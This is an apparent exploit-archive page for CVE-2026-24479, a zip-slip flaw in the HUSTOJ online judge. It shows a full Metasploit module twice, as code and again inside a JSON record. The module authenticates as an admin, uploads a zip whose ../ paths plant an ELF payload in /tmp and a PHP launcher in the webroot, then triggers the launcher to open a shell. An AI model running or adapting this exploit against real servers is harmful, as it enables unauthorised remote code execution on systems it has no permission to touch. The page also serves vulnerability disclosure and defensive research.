📄 HUSTOJ Zip Slip / Remote Code Execution_PACKETSTORM:221161

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

This Metasploit module demonstrates a remote code execution vulnerability in HUSTOJ. A user with administrative privileges can abuse the problemimportqduoj.php CGI script using a crafted zip file zip-slip to traverse backwards through the filesystem,...

Visit Original Source

Basic Information

ID PACKETSTORM:221161

Published May 15, 2026 at 00:00

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'digest/md5'
# Metasploit module for exploiting HUSTOJ problem import RCE (CVE-2026-24479)
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Retry
include Msf::Exploit::EXE
def initialize(info = {})
super(
update_info(
info,
'Name' => 'HUSTOJ Admin users can zip-slip problem_import_qduoj.php, planting PHP files in webroot for RCE',
'Description' => <<~DESC,
A user with administrative privileges can abuse the problem_import_qduoj.php CGI script
using a crafted zip file (zip-slip) to traverse backwards through the filesystem, then to the
webroot, where they can extract a PHP file that spawns a shell to get full RCE in the
context of the webserver.
DESC
'Author' => [
'oxagast', # exploit author
'LoTuS and friends', # chinese to english translations
'ling101w' # original discovery
],
'License' => MSF_LICENSE,
'Arch' => [ARCH_X64],
'References' => [
[
'URL', 'https://github.com/oxagast/oxasploits/blob/JoshuaJohnWard/exploits' \
'/CVE-2026-24479/hustoj_problem_import_rce.rb'
],
[
'URL', 'https://github.com/zhblue/hustoj/commit/902bd09e6d0011fe89cd84d423' \
'6899314b33101f'
],
['URL', 'https://github.com/zhblue/hustoj/security/advisories/GHSA-xmgg-2rw4-7fxj'],
['CVE', '2026-24479'],
['CWE', '22']
],
'Platform' => 'linux',
'Targets' => [['Auto', {} ]],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
},
'DisclosureDate' => '2026-01-26'
)
)
register_options(
[
OptString.new('USERNAME', [true, "The HUSTOJ administrative user's username", 'admin']),
OptString.new('PASSWORD', [true, "The HUSTOJ administrative user's password", nil]),
OptString.new('DROPFILE', [false, 'The name of the file to drop on the target (without extension)', 'RANDOM']),
OptString.new('SERVLOC', [true, 'The location HUSTOJ is being served from', '/home/judge']),
OptBool.new('FORCE', [false, 'Try to exploit even if it will probably fail', false]),
OptInt.new('TRAVERSE_LIMIT', [true, 'Number of ../ traversals to include in zip slip paths', 6]),
OptInt.new('TIME_LIMIT', [true, 'Time limit for the exploit to succeed in seconds', 60])
]
)
end

# Authenticate as admin and return session cookies
def login(user, pass)
check = send_request_cgi(
'uri' => '/include/reinfo.js',
'method' => 'GET',
'ctype' => 'application/javascript'
)
if check.nil?
fail_with(Failure::Unreachable, 'Failed to connect to the target webserver!')
else
print_good("Connected to the target webserver! #{Rex::Socket.to_authority(datastore['RHOST'], datastore['RPORT'])}")
end
# try to figure out what we are running against
unless check && check.code == 200
if check && check.code == 404
print_error('Target returned 404 for /include/reinfo.js, this is not HUSTOJ!')
else
print_error('Target responded, but check did not pass!')
end
unless datastore['FORCE']
fail_with(Failure::NotFound, 'Could not find reinfo.js. Target is not running HUSTOJ! Try FORCE.')
end
end
unless check && check.code == 200 && check.body && check.body.include?('function escapeHtml(str) {') == false
print_error('Target appears to be running HUSTOJ, but my be a patched version!')
unless datastore['FORCE']
print_error('Body check does not contain escapehtml function...')
fail_with(Failure::NotVulnerable, 'Target is running a patched version of HUSTOJ! Try FORCE.')
end
end
if check && check.code == 200 && check.body && check.body.include?('var ret=pat.exec(errmsg);') && check.body.include?('function escapeHtml(str) {') == false
print_good('Good! Target appears to be running a vulnerable version of HUSTOJ!')
else
print_error('Target does not appear to be running a vulnerable version of HUSTOJ!')
unless datastore['FORCE']
print_error('Body check does not contain pat.exec function')
fail_with(Failure::NotFound, 'Target is not HUSTOJ or is a patched version! Try FORCE.')
end
end
send_request_cgi(
'method' => 'POST',
'uri' => '/login.php',
'keep_cookies' => true,
'ctype' => 'application/x-www-form-urlencoded',
'vars_post' => {
'user_id' => user,
'password' => Digest::MD5.hexdigest(pass)
}
)

# Check if login was successful
res = send_request_cgi(
'method' => 'GET',
'uri' => '/modifypage.php',
'keep_cookies' => true
)
# we check for userinfo.php because it doesn't exist if our login fails
unless res && res.code == 200 && res.body && res.body.include?('userinfo.php')
fail_with(Failure::NoAccess, 'Failed to authenticate! Check credentials.')
end
stars = '*' * pass.length
print_good("Logged in successfully! #{user}:#{stars}")
# Check if the account has admin privileges
res = send_request_cgi(
'method' => 'GET',
'uri' => '/admin/menu2.php',
'keep_cookies' => true
)
unless res && res.code == 200 && res.body && res.body.include?('problem_import.php')
fail_with(Failure::NoAccess, 'Authenticated but does not appear to have admin privileges!')
end
return true
end

# Upload the malicious zip payload using the admin session
def upload_payload(zip_dat, _rand_tag, dds)
zip_size_kb = (zip_dat.length / 1024.0).round(2)
print_status("Uploading the payload... #{zip_size_kb}kb")
form_data = Rex::MIME::Message.new
# it is ncessary for the MIME type to be application/octet-stream instead of application/zip
# for this to work when using Rex::MIME::Message, otherwise no POST req is ever made. Not
# entirely sure what causes this.
form_data.add_part(zip_dat, 'application/octet-stream', nil, "form-data; name=\"fps\"; filename=\"#{datastore['DROPFILE']}.zip\"")
res = send_request_cgi(
'method' => 'POST',
'uri' => '/admin/problem_import_qduoj.php',
'keep_cookies' => true,
'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
'data' => form_data.to_s
)
if res && res.code == 200
print_good("Payload uploaded! #{datastore['DROPFILE']}.zip")
print_status("This is where the zipslip happens... #{dds} (levels: #{datastore['TRAVERSE_LIMIT']})")
else
fail_with(Failure::UnexpectedReply, 'Failed to upload the payload! Check your session and try again.')
end
end

# Trigger the uploaded PHP shell to execute the payload
def trigger_sploit(rand_tag)
print_status("Triggering the php script... #{datastore['DROPFILE']}-#{rand_tag}.php")
trig = send_request_raw(
{
'uri' => "/#{datastore['DROPFILE']}-#{rand_tag}.php",
'method' => 'GET'
}
)
if trig && trig.code == 200
sleep(2) # give it a moment to pop the session before we ret
return true
end
end

# Clean up dropped files after exploitation
def cleanup
super
# prevents the cleanup routine from running multiple times (reduses log noise)
send_request_raw(
{
'uri' => "/#{datastore['DROPFILE']}-cu.php",
'method' => 'GET'
}
)
print_status('Cleaning up the payload caller and shell files...')
end

# Main exploit logic
def exploit
# Authenticate, upload, and trigger the exploit!
if datastore['DROPFILE'] == 'RANDOM'
datastore['DROPFILE'] = Rex::Text.rand_text_alpha(3)
end
opts = {
format: 'elf'
}
shell_gend = generate_payload_exe(opts)
unless datastore['DROPFILE'].match?(/\A\w+\z/)
fail_with(Failure::BadConfig, 'DROPFILE should be alphanumeric.')
end
if shell_gend.empty?
fail_with(Failure::PayloadFailed, 'Payload generation failed! Try a different payload?')
end
print_good("Payload generated! #{datastore['PAYLOAD']}")
# Generate a random tag for file uniqueness
rand_tag = Rex::Text.rand_text_alpha(5)
print_status("Random payload tag #{rand_tag}")
# PHP script to call the ELF payload
shell_caller = "<?php http_response_code(200); fastcgi_finish_request(); chmod('/tmp/#{datastore['DROPFILE']}-#{rand_tag}', 0700); system('/tmp/#{datastore['DROPFILE']}-#{rand_tag}'); ?>"
# PHP script to clean up dropped files
cleanup_caller = "<?php unlink('/tmp/#{datastore['DROPFILE']}-#{rand_tag}'); unlink('#{datastore['SERVLOC']}/src/web/#{datastore['DROPFILE']}" \
"-#{rand_tag}.php'); unlink('#{datastore['SERVLOC']}/src/web/#{datastore['DROPFILE']}-cu.php'); ?>"
dds = '../' * datastore['TRAVERSE_LIMIT'] # Directory traversal string for zipslip
# Files to include in the malicious zip (zipslip paths for traversal)
# problem_1010 in/out files can be empty, but should be in the zip to ensure serverside import
files = [
{ data: shell_gend, fname: "#{dds}tmp/#{datastore['DROPFILE']}-#{rand_tag}" },
{ data: shell_caller, fname: "#{dds}#{datastore['SERVLOC']}/src/web/#{datastore['DROPFILE']}-#{rand_tag}.php" },
{ data: cleanup_caller, fname: "#{dds}#{datastore['SERVLOC']}/src/web/#{datastore['DROPFILE']}-cu.php" },
{ data: '{}', fname: 'problem_1010.json' },
{ data: '', fname: 'problem_1010/1.in' },
{ data: '', fname: 'problem_1010/1.out' }
]
# Create the malicious zip archive
zip_dat = Msf::Util::EXE.to_zip(files)
fail_with(Failure::PayloadFailed, 'Zip generation failed!') if zip_dat.empty?
print_good("Zip file generated! Files: #{files.length}")
unless datastore['TRAVERSE_LIMIT'] >= 2
fail_with(Failure::BadConfig, 'TRAVERSE_LIMIT should be at least 2 to ensure the zip slip can reach the root of the fs!')
end
unless datastore['USERNAME'] && datastore['PASSWORD']
fail_with(Failure::BadConfig, 'USERNAME and PASSWORD must be set to an admin account!')
end
unless login(datastore['USERNAME'], datastore['PASSWORD']) && upload_payload(zip_dat, rand_tag, dds)
fail_with(Failure::Unknown, 'Something strange happened in the login or upload!')
end
popped = retry_until_truthy(timeout: datastore['TIME_LIMIT']) do
trigger_sploit(rand_tag)
end
unless popped
fail_with(Failure::PayloadFailed, 'Failed to trigger the payload within timeout! Check your listener?')
end
end
end

{
    "lastseen": "2026-05-15T16:31:56",
    "description": "This Metasploit module demonstrates a remote code execution vulnerability in HUSTOJ. A user with administrative privileges can abuse the problemimportqduoj.php CGI script using a crafted zip file zip-slip to traverse backwards through the filesystem,...",
    "published": "2026-05-15T00:00:00",
    "modified": "2026-05-15T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 HUSTOJ Zip Slip / Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:221161",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-24479"
    ],
    "sourceData": "##\n    # This module requires Metasploit: https://metasploit.com/download\n    # Current source: https://github.com/rapid7/metasploit-framework\n    ##\n    \n    require 'digest/md5'\n    # Metasploit module for exploiting HUSTOJ problem import RCE (CVE-2026-24479)\n    class MetasploitModule < Msf::Exploit::Remote\n      Rank = GreatRanking\n      include Msf::Exploit::Remote::HttpClient\n      include Msf::Exploit::Retry\n      include Msf::Exploit::EXE\n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'HUSTOJ Admin users can zip-slip problem_import_qduoj.php, planting PHP files in webroot for RCE',\n            'Description' => <<~DESC,\n              A user with administrative privileges can abuse the problem_import_qduoj.php CGI script\n              using a crafted zip file (zip-slip) to traverse backwards through the filesystem, then to the\n              webroot, where they can extract a PHP file that spawns a shell to get full RCE in the\n              context of the webserver.\n            DESC\n            'Author' => [\n              'oxagast', # exploit author\n              'LoTuS and friends', # chinese to english translations\n              'ling101w' # original discovery\n            ],\n            'License' => MSF_LICENSE,\n            'Arch' => [ARCH_X64],\n            'References' => [\n              [\n                'URL', 'https://github.com/oxagast/oxasploits/blob/JoshuaJohnWard/exploits' \\\n                '/CVE-2026-24479/hustoj_problem_import_rce.rb'\n              ],\n              [\n                'URL', 'https://github.com/zhblue/hustoj/commit/902bd09e6d0011fe89cd84d423' \\\n                '6899314b33101f'\n              ],\n              ['URL', 'https://github.com/zhblue/hustoj/security/advisories/GHSA-xmgg-2rw4-7fxj'],\n              ['CVE', '2026-24479'],\n              ['CWE', '22']\n            ],\n            'Platform' => 'linux',\n            'Targets' => [['Auto', {} ]],\n            'DefaultTarget' => 0,\n            'Notes' => {\n              'Stability' => [CRASH_SAFE],\n              'Reliability' => [REPEATABLE_SESSION],\n              'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n            },\n            'DisclosureDate' => '2026-01-26'\n          )\n        )\n        register_options(\n          [\n            OptString.new('USERNAME', [true, \"The HUSTOJ administrative user's username\", 'admin']),\n            OptString.new('PASSWORD', [true, \"The HUSTOJ administrative user's password\", nil]),\n            OptString.new('DROPFILE', [false, 'The name of the file to drop on the target (without extension)', 'RANDOM']),\n            OptString.new('SERVLOC', [true, 'The location HUSTOJ is being served from', '/home/judge']),\n            OptBool.new('FORCE', [false, 'Try to exploit even if it will probably fail', false]),\n            OptInt.new('TRAVERSE_LIMIT', [true, 'Number of ../ traversals to include in zip slip paths', 6]),\n            OptInt.new('TIME_LIMIT', [true, 'Time limit for the exploit to succeed in seconds', 60])\n          ]\n        )\n      end\n    \n      # Authenticate as admin and return session cookies\n      def login(user, pass)\n        check = send_request_cgi(\n          'uri' => '/include/reinfo.js',\n          'method' => 'GET',\n          'ctype' => 'application/javascript'\n        )\n        if check.nil?\n          fail_with(Failure::Unreachable, 'Failed to connect to the target webserver!')\n        else\n          print_good(\"Connected to the target webserver! #{Rex::Socket.to_authority(datastore['RHOST'], datastore['RPORT'])}\")\n        end\n        # try to figure out what we are running against\n        unless check && check.code == 200\n          if check && check.code == 404\n            print_error('Target returned 404 for /include/reinfo.js, this is not HUSTOJ!')\n          else\n            print_error('Target responded, but check did not pass!')\n          end\n          unless datastore['FORCE']\n            fail_with(Failure::NotFound, 'Could not find reinfo.js. Target is not running HUSTOJ! Try FORCE.')\n          end\n        end\n        unless check && check.code == 200 && check.body && check.body.include?('function escapeHtml(str) {') == false\n          print_error('Target appears to be running HUSTOJ, but my be a patched version!')\n          unless datastore['FORCE']\n            print_error('Body check does not contain escapehtml function...')\n            fail_with(Failure::NotVulnerable, 'Target is running a patched version of HUSTOJ!  Try FORCE.')\n          end\n        end\n        if check && check.code == 200 && check.body && check.body.include?('var ret=pat.exec(errmsg);') && check.body.include?('function escapeHtml(str) {') == false\n          print_good('Good! Target appears to be running a vulnerable version of HUSTOJ!')\n        else\n          print_error('Target does not appear to be running a vulnerable version of HUSTOJ!')\n          unless datastore['FORCE']\n            print_error('Body check does not contain pat.exec function')\n            fail_with(Failure::NotFound, 'Target is not HUSTOJ or is a patched version!  Try FORCE.')\n          end\n        end\n        send_request_cgi(\n          'method' => 'POST',\n          'uri' => '/login.php',\n          'keep_cookies' => true,\n          'ctype' => 'application/x-www-form-urlencoded',\n          'vars_post' => {\n            'user_id' => user,\n            'password' => Digest::MD5.hexdigest(pass)\n          }\n        )\n    \n        # Check if login was successful\n        res = send_request_cgi(\n          'method' => 'GET',\n          'uri' => '/modifypage.php',\n          'keep_cookies' => true\n        )\n        # we check for userinfo.php because it doesn't exist if our login fails\n        unless res && res.code == 200 && res.body && res.body.include?('userinfo.php')\n          fail_with(Failure::NoAccess, 'Failed to authenticate! Check credentials.')\n        end\n        stars = '*' * pass.length\n        print_good(\"Logged in successfully! #{user}:#{stars}\")\n        # Check if the account has admin privileges\n        res = send_request_cgi(\n          'method' => 'GET',\n          'uri' => '/admin/menu2.php',\n          'keep_cookies' => true\n        )\n        unless res && res.code == 200 && res.body && res.body.include?('problem_import.php')\n          fail_with(Failure::NoAccess, 'Authenticated but does not appear to have admin privileges!')\n        end\n        return true\n      end\n    \n      # Upload the malicious zip payload using the admin session\n      def upload_payload(zip_dat, _rand_tag, dds)\n        zip_size_kb = (zip_dat.length / 1024.0).round(2)\n        print_status(\"Uploading the payload... #{zip_size_kb}kb\")\n        form_data = Rex::MIME::Message.new\n        # it is ncessary for the MIME type to be application/octet-stream instead of application/zip\n        # for this to work when using Rex::MIME::Message, otherwise no POST req is ever made.  Not\n        # entirely sure what causes this.\n        form_data.add_part(zip_dat, 'application/octet-stream', nil, \"form-data; name=\\\"fps\\\"; filename=\\\"#{datastore['DROPFILE']}.zip\\\"\")\n        res = send_request_cgi(\n          'method' => 'POST',\n          'uri' => '/admin/problem_import_qduoj.php',\n          'keep_cookies' => true,\n          'ctype' => \"multipart/form-data; boundary=#{form_data.bound}\",\n          'data' => form_data.to_s\n        )\n        if res && res.code == 200\n          print_good(\"Payload uploaded! #{datastore['DROPFILE']}.zip\")\n          print_status(\"This is where the zipslip happens... #{dds} (levels: #{datastore['TRAVERSE_LIMIT']})\")\n        else\n          fail_with(Failure::UnexpectedReply, 'Failed to upload the payload! Check your session and try again.')\n        end\n      end\n    \n      # Trigger the uploaded PHP shell to execute the payload\n      def trigger_sploit(rand_tag)\n        print_status(\"Triggering the php script... #{datastore['DROPFILE']}-#{rand_tag}.php\")\n        trig = send_request_raw(\n          {\n            'uri' => \"/#{datastore['DROPFILE']}-#{rand_tag}.php\",\n            'method' => 'GET'\n          }\n        )\n        if trig && trig.code == 200\n          sleep(2) # give it a moment to pop the session before we ret\n          return true\n        end\n      end\n    \n      # Clean up dropped files after exploitation\n      def cleanup\n        super\n        # prevents the cleanup routine from running multiple times (reduses log noise)\n        send_request_raw(\n          {\n            'uri' => \"/#{datastore['DROPFILE']}-cu.php\",\n            'method' => 'GET'\n          }\n        )\n        print_status('Cleaning up the payload caller and shell files...')\n      end\n    \n      # Main exploit logic\n      def exploit\n        # Authenticate, upload, and trigger the exploit!\n        if datastore['DROPFILE'] == 'RANDOM'\n          datastore['DROPFILE'] = Rex::Text.rand_text_alpha(3)\n        end\n        opts = {\n          format: 'elf'\n        }\n        shell_gend = generate_payload_exe(opts)\n        unless datastore['DROPFILE'].match?(/\\A\\w+\\z/)\n          fail_with(Failure::BadConfig, 'DROPFILE should be alphanumeric.')\n        end\n        if shell_gend.empty?\n          fail_with(Failure::PayloadFailed, 'Payload generation failed!  Try a different payload?')\n        end\n        print_good(\"Payload generated! #{datastore['PAYLOAD']}\")\n        # Generate a random tag for file uniqueness\n        rand_tag = Rex::Text.rand_text_alpha(5)\n        print_status(\"Random payload tag #{rand_tag}\")\n        # PHP script to call the ELF payload\n        shell_caller = \"<?php http_response_code(200); fastcgi_finish_request(); chmod('/tmp/#{datastore['DROPFILE']}-#{rand_tag}', 0700); system('/tmp/#{datastore['DROPFILE']}-#{rand_tag}'); ?>\"\n        # PHP script to clean up dropped files\n        cleanup_caller = \"<?php unlink('/tmp/#{datastore['DROPFILE']}-#{rand_tag}'); unlink('#{datastore['SERVLOC']}/src/web/#{datastore['DROPFILE']}\" \\\n          \"-#{rand_tag}.php'); unlink('#{datastore['SERVLOC']}/src/web/#{datastore['DROPFILE']}-cu.php'); ?>\"\n        dds = '../' * datastore['TRAVERSE_LIMIT'] # Directory traversal string for zipslip\n        # Files to include in the malicious zip (zipslip paths for traversal)\n        # problem_1010 in/out files can be empty, but should be in the zip to ensure serverside import\n        files = [\n          { data: shell_gend, fname: \"#{dds}tmp/#{datastore['DROPFILE']}-#{rand_tag}\" },\n          { data: shell_caller, fname: \"#{dds}#{datastore['SERVLOC']}/src/web/#{datastore['DROPFILE']}-#{rand_tag}.php\" },\n          { data: cleanup_caller, fname: \"#{dds}#{datastore['SERVLOC']}/src/web/#{datastore['DROPFILE']}-cu.php\" },\n          { data: '{}', fname: 'problem_1010.json' },\n          { data: '', fname: 'problem_1010/1.in' },\n          { data: '', fname: 'problem_1010/1.out' }\n        ]\n        # Create the malicious zip archive\n        zip_dat = Msf::Util::EXE.to_zip(files)\n        fail_with(Failure::PayloadFailed, 'Zip generation failed!') if zip_dat.empty?\n        print_good(\"Zip file generated! Files: #{files.length}\")\n        unless datastore['TRAVERSE_LIMIT'] >= 2\n          fail_with(Failure::BadConfig, 'TRAVERSE_LIMIT should be at least 2 to ensure the zip slip can reach the root of the fs!')\n        end\n        unless datastore['USERNAME'] && datastore['PASSWORD']\n          fail_with(Failure::BadConfig, 'USERNAME and PASSWORD must be set to an admin account!')\n        end\n        unless login(datastore['USERNAME'], datastore['PASSWORD']) && upload_payload(zip_dat, rand_tag, dds)\n          fail_with(Failure::Unknown, 'Something strange happened in the login or upload!')\n        end\n        popped = retry_until_truthy(timeout: datastore['TIME_LIMIT']) do\n          trigger_sploit(rand_tag)\n        end\n        unless popped\n          fail_with(Failure::PayloadFailed, 'Failed to trigger the payload within timeout!  Check your listener?')\n        end\n      end\n    end",
    "sourceHref": "https://packetstorm.news/download/221161",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/221161/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply